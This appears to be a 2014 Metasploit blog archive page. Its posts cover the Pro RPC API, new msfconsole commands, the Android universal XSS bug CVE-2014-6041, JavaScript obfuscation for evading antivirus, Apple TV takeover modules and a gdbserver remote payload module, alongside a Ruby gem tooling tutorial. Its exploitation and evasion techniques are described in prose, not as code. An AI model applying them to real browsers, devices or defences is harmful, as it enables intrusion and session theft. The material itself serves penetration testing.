Skip navigation
All Places > Metasploit > Blog > 2014 > September

The Metasploit RPC API provides a straightforward, programmatic way to accomplish basic tasks with your Metasploit Pro instance. Two of the key capabilities are export generation to backup your data and report generation to summarize and share your findings. The RPC API docs are currently undergoing a major overhaul and are a bit out of date for reports and export generation. This post will provide all the examples and configuration options you need to get running.


Setting up a client to make the API calls is simple:


# This class is defined under pro/api-example
require_relative 'metasploit_rpc_client'
client =, token:api_token, ssl:false, port:50505)


Note that there are example scripts shipped with Metasploit Pro that show these examples and more. They can be found inside the install directory (on *nix systems /opt/metasploit) under apps/pro/api-example. They are simple wrappers that allow you to pass in required arguments, so good for getting a feel for things. In addition to the API calling code, however you implement that, you need to have the Metasploit Pro instance running and you need to generate an API key. This can be done from Administration -> Global Settings.



Listing existing reports

report_list displays all reports that have been generated in the workspace you specify:


report_list ='pro.report_list', workspace_name)
puts "Existing Reports: #{report_list}"

Sample output:

Existing Reports: {7=>[{"id"=>6, "report_id"=>7, "file_path"=>"/Users/shuckins/rapid7/pro/reports/artifacts/CredentialMetaModule-20140912105153.pdf", 
"created_at"=>1410537159, "updated_at"=>1410537159, "accessed_at"=>nil, "workspace_id"=>2, "created_by"=>"shuckins", "report_type"=>"mm_auth", "file_size"=>34409}],

The keys of the Hash are the report IDs, needed for download as will be seen below. The value Array contains all the artifacts that were generated. An artifact is simply a particular file in a particular format. For example, when you generate an Audit report and select file formats PDF, HTML, and Doc, this results in a single report with three child artifacts.

Getting information on available reports to generate

type_list ='pro.list_report_types')
puts "Allowed Report types: #{type_list}"


Sample output (snipped, full output includes every report type):

Allowed Report types:
{"activity"=>{"required_data"=>"tasks", "file_formats"=>"pdf, html, rtf", "options"=>"include_task_logs",
"sections"=>"cover, project_summary, task_details", "report_directory"=>"/Users/shuckins/rapid7/pro/reports/activity/", "parent_template_file"=>"/Users/shuckins/rapid7/pro/reports/activity/main.jrxml"},


Downloading a report (all child artifacts)

report_id = 1 # Get this from report_list call
report ='pro.report_download', report_id)
report['report_artifacts'].each_with_index do |a, i|
    tmp_path = "/tmp/report_test_#{i}_#{}#{File.extname(a['file_path'])}", 'w') {|c| c.write a['data']}
    puts "Wrote report artifact #{report_id} to #{tmp_path}"


This will download every artifact related to this report generation (1-4 files depending on format selection).


Downloading particular report artifacts

If you only want a particular artifact file under a report, you can download that using the artifact ID provided from the report_list call.


report_artifact_id = 1
artifact ='pro.report_artifact_download', report_artifact_id)
tmp_path = "/tmp/report_#{report_artifact_id}#{File.extname(artifact['file_path'])}", 'w') {|c| c.write artifact['data']}
puts "Wrote report artifact #{report_artifact_id} to #{tmp_path}"


Generating a report

There are a number of options available for this call, detailed below. This basic version generates a single PDF artifact of the Audit report:

report_hash = {workspace: workspace_name,
               name: "SuperTest_#{}",
               report_type: :audit,
               created_by: 'whoareyou',
               file_formats: [:pdf]
report_creation ='pro.start_report', report_hash)
puts "Created report: #{report_creation}"

There's currently no API call to provide report (or export) generation status. The time required depends entirely on your data size and complexity. One place to check for status is the reports.log file.

Configuration options

These are placed in the hash passed to the start_report call.


  • name: String, the name for the report shown in the web UI and in the file path; used in forming the filenames of the artifacts generated
  • report_type: String, must be one of those listed by list_report_types, e.g.: activity, audit, credentials, collected_evidence, compromised_hosts, custom, fisma, mm_auth, mm_pnd, mm_segment, pci, services, social_engineering, webapp_assessment
  • report_template: if type 'custom' this can be set, String, full file path to custom Jasper jrxml template. If not a custom report, do not use this.
  • workspace_name: String, name of the workspace to which the report will be scoped
  • created_by: String, username to which the report should be attributed
  • file_formats: Array, the file format(s) of the artifacts to be generated. Must specify at least one. Available types vary slightly per report, 'pdf' is present for all. See list_report_types for formats per type.


  • email_recipients: String, addresses to which the report artifact(s) should be emailed. Addresses can be separated with comma, semicolon, newlines, or spaces.
  • mask_credentials: Boolean, whether credentials shown in report artifacts should be scrubbed (replaced with '*MASKED*')
  • included_addresses: String, space-separated addresses to include in the report. Can include wildcards, ranges, CIDR.
  • excluded_addresses: String, space-separated addresses to exclude from the report. Can include wildcards, ranges, CIDR. If included and excluded are both specified, they are both expanded and the address set used is included - excluded.
  • logo_path: String, full path to image file to use on cover page of report artifacts. If not specified, the Rapid7 logo is used. Must be of type: gif, png, jpg, or jpeg
  • options: sub hash of additional configuration options:
    • include_sessions: Boolean, whether information on sessions should be included in the report if applicable
    • include_charts: Boolean, whether graphs should be included in the report if applicable
    • include_page_code: Boolean, whether HTML code of pages in SE campaigns should be included in the report versus just an image preview of the rendered page
  • se_campaign_id: Integer, the ID of the SE campaign the report should cover. Only applied to SE report.
  • sections: Array, specific sections of the report to include. If this is specified only the specified sections will be included. If not specified all sections will be included. For section names, see list_report_types.
  • usernames_reported: String, comma-separated list of users to be included as active in the report. This is usually shown in the Executive summary section.


Export coverage is nearly identical to reports.

Listing existing exports

export_list ='pro.export_list', workspace_name)
puts "Existing Exports: #{export_list}"


Generating an export

export_types = ['zip_workspace','xml','replay_scripts','pwdump’]
# NOTE: If you are not on the latest update of 4.10 (4.10.0-2014092401) this requires workspace_id with integer value of ID.
# If you've updated to this point you can use workspace with a string value of name as below.
export_config = {created_by: 'whoareyou',
                           export_type: export_types[1],
                           workspace: 'ThePlace'}
export_creation ='pro.start_export', export_config)
puts "Created export: #{export_creation}"


Downloading a generated export

export_id = 1
export ='pro.export_download', export_id)
tmp_path = "/tmp/export_test_#{export_id}#{File.extname(export['file_path'])}", 'w') {|c| c.write export['data']}
puts "Wrote export #{export_id} to #{tmp_path}"


Configuration options


  • created_by: String, username to which the export should be attributed
  • export_type: String, must be one of: zip_workspace, xml, replay_scripts, pwdump
  • workspace: String, name of the workspace to which export will be scoped


  • name: String, the name for the export shown in the web UI and in the file path; unacceptable characters are changed to underscores or removed
  • mask_credentials: Boolean, whether credentials shown in XML and other files should be scrubbed (replaced with '*MASKED*')
  • included_addresses: String, space-separated addresses to include in the export. Can include wildcards, ranges, CIDR.
  • excluded_addresses: String, space-separated addresses to exclude from the export. Can include wildcards, ranges, CIDR. If included and excluded are both specified, they are both expanded and the address set used is included – excluded.

Hello, Metasploiters! Just wanted to update y'all on a new feature in msfconsole that *hopefully* should make vgrepping through module options a little easier.


Show empty required options


The new command is show missing, and all it does is show empty required options. Instead of looking through a long list of options and picking out the required ones that haven't been set, just run show missing, and a list of unset required options will be shown.


Here's an example with smb_login:



Pretty snazzy, huh?


It also works on payload options, as we can see with good ol' ms08_067_netapi:



That's all there is to it!

First things first -- today is International Talk Like a Pirate Day, which is great for me, given my office decor. Arrr! So grab a flagon of grog, and read on, ye landlubbers!


Updates to the Android Universal XSS bug (CVE-2014-6041)

This has been a pretty busy week for us here in Metasploit Nation. You probably heard about Rafay Baloch's kind of massive SOP-busting Android disclosure affecting the stock Android Open Source browser. Well, we've been digging into this some more, and have a couple new findings to report.


First off, it's not limited to just the AOSP browser. Other browsers that use the vulnerable version of WebView are also affected. We've successfully exploited both the Maxthon Browser (which claims 600 million downloads) and the CM Browser (which is has 10 million to 50 million installs). We're confident there are plenty of apps that use WebView that are vulnerable to this UXSS, and so far, I haven't seen a lot of patching activity beyond Google's upstream patches to Android (reported to us by Paul Irish of Google). Of course, patching upstream doesn't really help the downstream users, unless and until the carriers and handset manufacturers roll it out. So, if you're on a pre-4.4 phone (which is likely, given that 75% of all active Android devices are pre-KitKat), be careful out there. Consider using an alternative, non-vulnerable browser -- Google Chrome and Mozilla Firefox are fine choices, assuming you have enough hardware oomph to run them.


Second, we've landed a fix to the Metasploit module to better enable integration with BeEF, the Browser Exploitation Framework. BeEF, by Wade Alcorn and friends, is a pretty powerful exploit toolkit that takes advantage of cross-site scripting bugs to "hook" browsers into doing the bidding of the BeEF operator. In fact, we shot a quick five minute video yesterday to demonstrate this functionality.




While most demos involving BeEF do silly things like play pirate sea shanties on the victim's device, keep in mind that the security context of the code executed is that of the XSS-vulnerable site. With a universal XSS bug (UXSS) like this, all sites are vulnerable. It becomes trivial for attackers to GET and POST on behalf of the user to any site the user is authenticated to -- Facebook, company webmail, Amazon Ali Baba... the level of hijinks is really only limited by the imagination of the attacker. This is why a breakdown of the Same Origin Policy is so damaging; it's just about the worst thing that can happen to a web browser, or anything with browser-like functionality, short of a full shell.


Obfuscating Metasploit-Delivered Javascript

Also this week, Wei sinn3r Chen has been busily updating the Metasploit Framework Wiki with new material on obfsucating Javascript code for Metasploit module developers. One of the challenges penetration testers face is not being able to use an exploit against a vulnerable target due to layers of signature-based detections or preventions. As an exploit dev, it's important to take this into consideration during development. There are many ways to do this, of course. Javascript-based exploits are relatively easy to modify, so usually you can just change a few lines and make your exploit undetectable by your target's anti-virus, HIDS, or other protection mechanisms. You can make the browser not cache anything, so some anti-virus products simply do not even see the malicious code. Or you can obfuscate, which provides more automation and easier to maintain. To learn more about Metasploit's JavaScript obfuscation APIs, you can read up on them here.


In addition, Wei and Joe Vennix (and friends) are also in the process of spinning out JSObfu as a Ruby gem. It was originally written by James Egypt Lee back in 2011, and it's high time for a refresh. We just stood up the GitHub repo today, so if you'd like to follow along and help out, pull requests accepted.


New Modules

Over the last week, we've added four new modules -- one exploit, and three auxiliary modules.


Exploit modules

Auxiliary and post modules


If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness upon the next official update; you can check for these updates through the Software Updates menu under Administration.

After Metasploitable in the Cloud and bWAPP, CTF365 has increase both, the number of "vulnerable by design" servers and operating systems by adding HacmeBank and HacmeCasino as vulnerable web applications courtesy to McAfee through Fundstone.


The machines runs on Windows Server 2008 and WindowXP thanks to Microsoft through their Bizspark Startup Program and they are accessible to anyone who has a Free CTF365 account.


Hacme Bank

Hacme BankTM is designed to teach application developers, programmers, architects and security professionals how to create secure software. Hacme BankTM simulates a “real-world” online banking application, which was built with a number of known and common vulnerabilities such as SQL injection and cross-site scripting.”




Hacme Casino

Hacme CasinoTM is a learning platform for secure software development and is targeted at software developers, application penetration testers, software architects, and anyone with an interest in application security.”




By adding these components to our free pentest lab, we hope to help new comers and ethical hacker wannabes find their way into the security industry as qualified security professionals.

If you’re an InfoSec instructor or teacher, feel free to use these applications in the cloud to create webcasts and teach your students. Also, if you’re a screencaster, feel free to use them in your video tutorials. Don’t forget to share your creations and experiences with the infosec community. We’d love to hear about them


You can access the servers at:

http://hacmebank.ctf (

http://hacmecasino.ctf (


In order to access them, please remember that you have to be logged into our CTF365 VPN.

If there’s a vulnerable-by-design server or web app that you’d like to see in the CTF365 cloud, leave the information for us in a comment below. We’ll review it and, if we think it’ll be a valuable contribution, we’ll add it to the cloud in the future.

We believe that entry level resources should be open and free of charge for anyone who wants to dive into the InfoSec industry. Through this, we think we can make the Internet a little bit safer.


As Metasploit adopts community best practices related to testing and code structure, we've started breaking up our new (and part of our old) work into separate projects that can developed and tested independently.  These smaller projects take the form of Ruby gems and Rails::Engines.  As we've made more and more gems, we've gotten a repeatable process for making new gems, but we thought our process might we useful for other developers in the community that are looking for a newer guide on how to setup ruby gems from scratch and get the most out of all the free tools available to open source projects.




Your gem will be open source, so you're going to want to host your source control server on one of the free source control services.  We use and I'd recommend it because other services are likely to have Github integration before support for the other source control service like Gitorious or Bitbucket.

Account Setup

If you don't have a Github account, set one up by signing up at

Repository Creation

Once logged into your Github account, when you go to, you'll see two columns, the left hand column is an activity stream while the right column lists repository. Click the big green, "+ New Repository" button to add a repository.

Repository Naming

What your name your repository is up to you, but you should keep rubygems naming conventions in mind:

Other Options

You can leave the rest of the options with their default values and click "Create repository".  After the repository is created, Github will display options for upload your code, but we haven't created any code yet, so let's do that.

RVM Installation

When developing Ruby projects on OSX (or Linux) we recommend using rvm (Ruby Version Manager), it's what we use.  Go to and follow the installation instructions.

Local Repository Creation

The point of RVM is you can have a different version of ruby and gems that you depend on for each project you work on.  We'll use the ability to setup the tools to create your gem's repository.  In the below steps, replace <GEM_NAME> with the name of the repository you created on Github and <GITHUB_USERNAME> with your username on Github.

  1. Create a gemset for your gem: rvm use --create ruby-2.1@<GEM_NAME>
  2. Create the parent directory for your local git repository

    1. cd ~
    2. mkdir git
    3. mkdir <GITHUB_USERNAME>
  3. Create the gem skeleton using bundle: bundle gem <GEM_NAME>
  4. cd  <GEM_NAME>
  5. bundle gem won't create a commit in the git repository, so do that now: git commit -m "bundle gem <GEM_NAME>"

Now, look back at Github in your browser and you'll see the instructions for pushing your local git repository to the remote repository on Github.  I've copied the instructions here for easier use:

git remote add origin<GITHUB_USERNAME>/<GEM_NAME>.git
git push -u origin master

Once the push has finished, refresh your browser and you'll see the gem skeleton in your Github repository.

Tool Integration

With the push to Github, you've now successfully started an open source gem project, but instead of stopping there, let's go on to add a common set of tools to take advantage of the project being open source.

Local Tools

We'll start with setting up some local tools that will help with development on our own machine.


Metasploit uses RSpec for a unit test framework.  RSpec can set itself up on installation, but must also be declared in the gemspec file.

  1. Add the rspec as a development dependency to <GEM_NAME.gemspec>: do |spec|
        # ...
        spec.add_development_dependency 'rspec', '~> 3.1'
        # ...
  2. Install the new gems: bundle install
  3. Use rspec to set itself up: rspec --init

rspec --init will choose some good defaults and include comments on other options you can enable in spec/spec_helper.rb, but for Metasploit we want to make sure we're using the rspec 3 features as well as possible, so we turn on some additional options and our spec/spec_helper.rb looks like this:

$LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)

require 'GEM_NAME'

RSpec.configure do |config|
  config.expose_dsl_globally = false

  # These two settings work together to allow you to limit a spec run
  # to individual examples or groups you care about by tagging them with
  # `:focus` metadata. When nothing is tagged with `:focus`, all examples
  # get run.
  config.filter_run :focus
  config.run_all_when_everything_filtered = true

  # allow more verbose output when running an individual spec file.
    # RSpec filters the backtrace by default so as not to be so noisy.
    # This causes the full backtrace to be printed when running a single
    # spec file (e.g. to troubleshoot a particular spec failure).
    config.full_backtrace = true

  # Print the 10 slowest examples and example groups at the
  # end of the spec run, to help surface which specs are running
  # particularly slow.
  config.profile_examples = 10

  # Run specs in random order to surface order dependencies. If you find an
  # order dependency and want to debug it, you can fix the order by providing
  # the seed, which is printed after each run.
  #     --seed 1234
  config.order = :random

  # Seed global randomization in this process using the `--seed` CLI option.
  # Setting this allows you to use `--seed` to deterministically reproduce
  # test failures related to randomization by passing the same `--seed` value
  # as the one that triggered the failure.
  Kernel.srand config.seed

  config.expect_with :rspec do |expectations|
    # Enable only the newer, non-monkey-patching expect syntax.
    expectations.syntax = :expect

  # rspec-mocks config goes here. You can use an alternate test double
  # library (such as bogus or mocha) by changing the `mock_with` option here.
  config.mock_with :rspec do |mocks|
    # Enable only the newer, non-monkey-patching expect syntax.
    # For more details, see:
    #   -
    mocks.syntax = :expect

    mocks.patch_marshal_to_support_partial_doubles = false

    # Prevents you from mocking or stubbing a method that does not exist on
    # a real object.
    mocks.verify_partial_doubles = true

To finish the RSpec setup, we want it runnable using rake.  We can do this by adding the following to Rakefile:

require 'rspec/core/rake_task'

task :default => :spec

You can test that your specs by calling rspec, rake spec, or just rake now, but no tests are defined, so rspec isn't testing anything for us.  To get some benefit from rspec we'll need to add spec file.  Usually, we'd test the gem versioning at this point.

  1. mkdir spec/<GEM_NAME>
  2. edit spec/<GEM_NAME>/version_spec.rb
  3. Add the following code to spec/<GEM_NAME>/version_spec.rb<:
    require 'spec_helper'
    RSpec.describe GEM_NAME do
      context 'CONSTANTS' do
        context 'VERSION' do
          subject(:version) {
          it { be_a String }
          it { match_regex(/\d+.\d+.\d+(-[a-zA-Z0-9]+)*/) }
  4. Run your new spec: rake spec


We can use RSpec to test our code, but how do we know our tests are testing all the gem code?  We need to use a tool that measure test coverage, SimpleCov.

  1. Add simplecov as a development dependency to <GEM_NAME>.gemspec: do |spec|
        # ...
        spec.add_development_dependency 'simplecov'
        # ...
  2. Install simplecov: bundle install
  3. Require simplecov before any other file in spec/spec_helper.rb
    # require before anything else so coverage is shown for all project files
    require 'simplecov'
  4. Metasploit uses a SimpleCov configuration file, .simplecov, that works both with rake spec and Rubymine, our Ruby IDE of choice:
    # RM_INFO is set when using Rubymine.  In Rubymine, starting SimpleCov is
    # controlled by running with coverage, so don't explicitly start coverage (and
    # therefore generate a report) when in Rubymine.  This _will_ generate a report
    # whenever `rake spec` is run.
    unless ENV['RM_INFO']
    SimpleCov.configure do
      # ignore this file
      add_filter '.simplecov'
      # Rake tasks aren't tested with rspec
      add_filter 'Rakefile'
      add_filter 'lib/tasks'
      # Changed Files in Git Group
      # @see
      untracked = `git ls-files --exclude-standard --others`
      unstaged = `git diff --name-only`
      staged = `git diff --name-only --cached`
      all = untracked + unstaged + staged
      changed_filenames = all.split("\n")
      add_group 'Changed' do |source_file|
        changed_filenames.detect { |changed_filename|
      add_group 'Libraries', 'lib'
      # Specs are reported on to ensure that all examples are being run and all
      # lets, befores, afters, etc are being used.
      add_group 'Specs', 'spec'
  5. Now, when you run rake spec, you'll generate a coverage report.
  6. Open the coverage report open coverage/index.html


By default, Ruby comes with a documentation format called RDoc, but for Metasploit, we use YARD because it allows for more structured documentation with the addition of `@tags` that would be familiar to anyone that's used Doxygen or Javadoc and the ability to write extensions as Metasploit has done with yard-metasploit-erd, which allows use to include ERDs (Entity-Relationship Diagram in our documentation to make working with the database easier.

At Rapid7, we've just released metasploit-yard, so we can share a common rake yard task.  The READMEexplains how to set it up:

  1. Add metasploit-yard as a development dependency to <GEM_NAME>.gemspec: do |spec|
        # ...
        spec.add_development_dependency 'metasploit-yard', '~> 1.0'
        # ...
  2. Install metasploit-yard: bundle install
  3. Add the following to your Rakefile to load yard.rake from metasploit-yard:
    # Use find_all_by_name instead of find_by_name as find_all_by_name will return pre-release versions
    gem_specification = Gem::Specification.find_all_by_name('metasploit-yard').first
    Dir[File.join(gem_specification.gem_dir, 'lib', 'tasks', '**', '*.rake')].each do |rake|
      load rake
  4. Run rake yard to see what you need to document.

Remote Tools

With RSpec, SimpleCov, and YARD setup, we can run tests and generate documentation locally, but doing everything locally is not enough, we need a second system, that isn't our develop machine to run these steps too to ensure that they aren't passing just because of some fluke of our local machine.

Travis CI

To test remotely, Metasploit uses Travis CI.  Travis CI is free for open source software and integrates well with github, as Travis CI is able to automatically test that Pull Requests pass our specs.  This is a big help on metasploit-framework where we're up to 3785 pull requests and 9200 builds.  Without Travis CI we'd either have had to run those all by hand, go through an error-prone and time-consuming manual process, or roll a Jenkins build pipeline to handle all of that, which would be a significant maintenance overhead.

On Travis CI, we can build against multiple implementations and versions of Ruby.  Metasploit tries to build all versions of MRI Ruby and the latest stable versions of JRuby and Rubinius (rbx in the .travis.yml).  We need to setup a Travis-CI account and then push a .travis.yml to Github:

  1. Go to
  2. Click "Sign in with Github" in the top-right corner
  3. On the left sidebar, click the "+" button to add a new repository for Travis CI to build.
  4. Select a repository to build by changing the slider on the right hand side of the table row from "Off" to "On"
  5. Add a .travis.ymlto the root of your local git repository:
        - RAKE_TASK=spec
    language: ruby
      # documentation coverage is not influenced by ruby implementation, so only run once
        - rvm: 2.1
          env: RAKE_TASK=yard
      - '1.9.3'
      - '2.0'
      - '2.1'
      - 'ruby-head'
      - 'jruby-19mode'
      - 'rbx-2.2'
    script: "bundle exec rake $RAKE_TASK"
  6. Add a Travis CI badge to your so users can quickly see if your project's build is failing when visiting the repository on Github: [![Build Status](<GITHUB_USER>/<GEM_NAME>.svg?branch=master)](<GITHUB_USER>/<GEM_NAME>). When done correctly it will look like this:
  7. Commit your change: git commit -am "Travis CI"
  8. Push your changes: git push
  9. Watch the build on Travis CI


CodeClimate is a automated code quality analyzer. Metasploit uses it for both our open source and private repositories; however, CodeClimate can't cope with the sure volume of code in metasploit-framework: metasploit-framework itself is a DoS attack on static analysis tools.  Like Travis CI, CodeClimate has a badge, which shows the Code Quality using a 4.0 GPA scale. CodeClimate also monitors code coverage, so we'll be adding a coverage report on top of SimpleCov.

  1. Go to and sign up for an account
  2. On your dashboard click the "Add Open Source Repo" button
  3. Enter your repo name: <GITHUB_USER>/&ltGEM_NAME>
  4. Click "Import Repo from Github"
  5. On the repository page, click the "Setting" link.
  6. Click the "Test Coverage" button in the left sidebar.
  8. You'll want to encrypt the CODECLIMATE_REPO_TOKEN on travis-ci to prevent forks from affecting the original repo's coverage, so install the travis gem: gem install travis
  9. Encrypt the token: travis encrypt CODECLIMATE_REPO_TOKEN=<YOUR_TOKEN_HERE>
  10. Put the encrypted value (remember to substitute your value and not to use the example value below) in your .travis.yml:
        secure: "G0LDGrupZ+RAFzoPwd6bjfrWfwoU/V9RTswQXIUNmi640rW/CP86a8F9hQcAXdUwy7Ag1cwmlEEv2JDDbLopQdNvkh8B7M3PSIpmJWlBsj+UPMMcCz04oYiQB3G6xgYb4xeuY6cNqxiY2rTJMHlfUfTlSJf1Z0dh6hAS3alHpGw="
  11. Add the CodeClimate badge to the README: [![Code Climate](<GITHUB_USER>/<GEM_NAME>.png)](<GITHUB_USER>/<GEM_NAME>)
  12. Add the codeclimate-test-reporteras a development dependency: do |spec|
      # ...
      spec.add_development_dependency 'codeclimate-test-reporter'
      # ...
  13. bundle install
  14. Add following after require 'simplecov'in spec/spec_helper.rb
    # ...
    require 'codeclimate-test-reporter'
    if ENV['TRAVIS'] == 'true'
      formatters = []
      # don't use `CodeClimate::TestReporter.start` as it will overwrite some .simplecov settings
        formatters << CodeClimate::TestReporter::Formatter
      SimpleCov.formatter = SimpleCov::Formatter::MultiFormatter[
    # ...
  15. git commit -am "CodeClimate"
  16. git push


Although CodeClimate has a coverage reporter, it only reports if there is coverage issues, to view the actual coverage reports online, as outputed locally by simplecov, Metasploit uses Coveralls.

  1. Go to
  2. Click "Sign up free with Github" in the top-right corner
  3. Click the "Add Repo" button on the Your Repositories screen
  4. Change the slider from "Off" to "On" next to your repository
  5. Add the Coveralls badge to your README: [![Coverage Status](<GITHUB_USER>/<GEM_NAME>.svg)](<GITHUB_USER>/<GEM_NAME>), which will look like this: Coverage Status
  6. Add coveralls as a development dependency: do |spec|
      # ...
      spec.add_development_dependency 'coveralls'
      # ...
  7. bundle install
  8. Change the SimpleCov.formatters in spec/spec_helper.rb to include Coveralls::SimpleCov::Formatter:
    # ...
    require 'codeclimate-test-reporter'
    require 'coveralls'
    if ENV['TRAVIS'] == 'true'
      formatters = []
      # don't use `CodeClimate::TestReporter.start` as it will overwrite some .simplecov settings
        formatters << CodeClimate::TestReporter::Formatter
      formatters << Coveralls::SimpleCov::Formatter
      SimpleCov.formatter = SimpleCov::Formatter::MultiFormatter[
    # ...
  9. Add a .coveralls.yml file
    service_name: travis-ci
  10. git commit -am "Coveralls"
  11. git push


Metasploit's various gems depend on many other gems from the community.  We need to keep track of new versions of those gems in case there are vulnerabilities both so we can update our usage of those gems and so we can make Metasploit Framework modules to exploit those vulnerability.  To monitor our gems, we use Gemnasium.  Gemnasium has sent us alerts about Rails vulnerabilities that have led to Rapid7's rapid vulnerability mitigation response with new updates across our Portfolio multiple times in the past.

  1. Go to
  2. Click "Sign up"
  3. Click "Sign up with Github"
  4. Click "Authorize application" on Github
  5. Click "+ Add New Project"
  6. Click "Hosted on Github"
  7. Click "Allow Access" in the "Public Project" column so Gemnasium can automatically configure the Github hooks
  8. Click "Authorize application" on Github to authorize the expanded permissions for Gemnasium
  9. Click your username to expand the list of your repositories
  10. Check the repositories to monitor
  11. Click Submit
  12. Add the Gemnasium badge to the README: [![Dependency Status](<GITHUB_USER>/<GEM_NAME>.svg)](<GITHUB_USER>/<GEM_NAME>)
  13. git commit -am "Gemnasium"
  14. git push


Although you haven't released your gem yet, once you do, you'll want users that visit your github repository to be able to find the latest released gem, which you can do with a Rubygems version badge

  1. Add to your README: [![Gem Version](<GEM_NAME>.svg)](<GEM_NAME>)
  2. git commit -am "Gemnasium"
  3. git push

Inch CI

Inch CI checks our documentation as a second review of the checking Metasploit already does with metasploit-yard.

  1. Go to
  2. Enter the URL to your github repository:<GITHUB_USER>/<GEM_NAME>
  3. In the top-right corner click the "doc" badge
  4. Select "SVG" for the image format
  5. Copy the "Markdown" badge
  6. Add it to your README
  7. git commit -am "Inch CI"
  8. git push

Pull Review

PullReview is another static analysis tool like CodeClimate.  Metasploit uses both because PullReview has a more detailed reviews and better handling of branches than CodeClimate, but CodeClimate is cheaper for our team for private repositories.  Just like CodeClimate, PullReview can't handle analysing metasploit-framework, but instead of lagging behind and reporting odd or out-of-date analysis, PullReview just won't return an analysis. Metasploit has had discussion with PullReview and they were nice enough to send us an offline analysis.

  1. Go to
  2. Enter your github username and sign up
  3. Click "Authorize application" on Github
  4. Click "Authorize access to my repositories on Github"
  5. Click "Authorize application" on Github to authorize PullReview to post reviews and setup hooks
  6. Click the "+ Review" button next to repository you want reviewed
  7. Add the badge to your README: [![PullReview stats](<GITHUB_USER>/<GEM_NAME>/badges/master.svg?)](<GITHUB_USER>/<GEM_NAME>/reviews/master), which should look like this: , which is a bit cooler than the CodeClimate badge.


So, that's everything.  Don't be intimidated by the length of this article: it takes about a day or less for me to set this all up on new projects.  If there are open source tools you think Metasploit should be using (such a static analysis tool that can handle metasploit framework and our odd Metasploit module format) let us know in the comments below.

On the night of September 7, 2014, Joe Vennix of Rapid7's Metasploit Products team wrote, "I did not believe this at first, but after some testing it seems true: in AOSP browser before Android 4.4, you can load javascript into any arbitrary frame or window [...]" and provided a Metasploit module to exploit this condition. After some of the usual testing and confirmation of the vulnerability, this module is available in all versions of Metasploit.


The vulnerability that Joe didn't believe is CVE-2014-6041, and was disclosed on September 1, 2014 by Rafay Baloch on his blog, Rafay Hacking Articles. By malforming a javascript: URL handler with a prepended null byte, an attacker can avoid the Android Open Source Platform (AOSP) Browser's Same-Origin Policy (SOP) browser security control.


What this means is, any arbitrary website (say, one controlled by a spammer or a spy) can peek into the contents of any other web page. Imagine you went to an attackers site while you had your webmail open in another window -- the attacker could scrape your e-mail data and see what your browser sees. Worse, he could snag a copy of your session cookie and hijack your session completely, and read and write webmail on your behalf.


This is a privacy disaster. The Same-Origin Policy is the cornerstone of web privacy, and is a critical set of components for web browser security. Oh, and it gets worse.


When this vulnerability was announced by Balcoh, it was met with... total silence. There has been no acknowledgement of the bug from Google, as far as we can tell. There's no listing of this bug on CVEDetail's readout of Android issues, and no chatter (we could find) in the Android security community about this bug.


Research and testing is still ongoing to plumb the depths of this issue. We'd like to pin down exactly when the bug was fixed, and to determine just how widespread this vector really is. After all, pre-4.4 builds of Android account for about 75% of the total Android ecosystem today.


More importantly, 4.2 (Jellybean) and prior phones account for nearly 100% of off-the-shelf, lower-end prepaid phones from major manufacturers and carriers. They still ship the unsupported AOSP browser. These are the kinds of phones that account for a huge chunk of total market share, and yet are still vulnerable to this bug and the WebView addJavascriptInterface vulnerability.


While the AOSP browser has "been killed off" by Google, it is wildly popular, even on modern devices used by sophisticated users who prefer the stock browser over Google Chrome, Firefox, Dolphin, or other browsers. A quick search for "AOSP browser" turns up page after page of instructions and HOWTOs on re-installing this defunct, unsupported-by-Google software. Among the top pages, I could find absolutely no mention of security concerns in reinstalling the original stock browser.


Later this week, I'll have a demo of the bug all video'ed up that's sufficiently shocking. I'd really like to continue the conversation about security for mid- to low-end devices that people trust with the details of their lives. I hope this Metasploit module (which is available today in all versions of Metasploit) spurs along the conversation on what we can do to ensure that the users of normal, off-the-shelf, brand-new phones aren't so vulnerable to privacy violations.


Edit: Changed Rafay's disclosure date to September 1, 2014. This appears to be more accurate when considering the GMT timezone. Clarified that the AOSP browser "has been killed off," not all of AOSP.

Apple TV Tricks

This week, we have three new auxiliary modules that facilitate taking over Apple TV devices, all from community contributor 0a2940, with help from Wei sinn3r Chen and Dave TheLightCosine Maloney. Why Apple TV? Well, for starters, we already have modules for Google's Chromecast, a similar chunk of consumer hardware, and we didn't want Google to think we were picking on them.


Secondly, these aren't just devices that live in people's living rooms. Apple TV has some level of marketing and presence in conference rooms -- in fact, there's literally a "Conference Room" display mode. This means that these devices, which are cheap (under $100 typically) and ubiquitous (at least, Apple hopes so), have a presence on many companies' networks, and almost certainly without any kind of formal IT control or asset management or anything like that.


Finally, the access security is basically non-existent. By default, Apple TV devices have no password. If you want some security, you're likely to pick the "OnScreen" mode, where the TV screen displays a four-digit PIN which you are supposed to key into your streaming device (or Metasploit module). Of course, that's trivially bruteforced. Rarely, you'll find an Apple TV device set up with a proper password.


What's the risk? Well, if the display is in some public location, and is being used for Serious Business(tm), a prankster can of course cause all kind of hijinks, from obvious (fill in your own shocking WTF image here), to subtle (how about quietly replacing one financial results spreadsheet with another, on the fly)?


Ultimately, though, we hope that research like this just brings some awareness to the coming Internet-of-Things and how we're apparently about to have tons and tons of these not-computer computers on our networks, just begging to be entry points for evil-doers. If Apple and Google, who are massive players in this IoT space, can't be bothered to engineer in some kind of sensible and user-friendly security-by-design on these things, how can we possibly expect newcomers with the next big IoT fad to fare any better?

The GDB Protocol

Last week, we added a new exploit module, "GDB Server Remote Payload Execution". If you've ever scanned a network full of developers, you might discover gdbserver, an unauthenticated remote service that allows developers to debug code in their kernel or on a different machine. Because of the nature of gdbserver, getting a shell is pretty straightforward - write a payload somewhere in RWX memory and execute. To make things easier for a pentester, we implemented a few parts of the gdbserver protocol in the Msf::Exploit::Remote::Gdb mixin, so any module can leverage it.


There are lots of ways to get a shell from gdbserver, and there are lots of options that the remote service may or may not support. In addition, the service might be an independent gdbserver binary running on the remote (possibly not even attached to a program), or it might be a "remote stub" that is compiled into an application or kernel. Stubs usually support only a minimal set of features, so we made sure that the exploit module only used features in the required set.


The exploit is pretty flexible: it discovers $PC, writes the payload, and continues execution. This is a rather destructive approach (since the original program will have memory contents overwritten), but since it is gdbserver we at least won't crash the target - just hang it if an interrupt or exception is thrown. Here's how to run the module against an arbitrary X86 linux box:


msf> use exploits/multi/gdb/gdb_server_exec

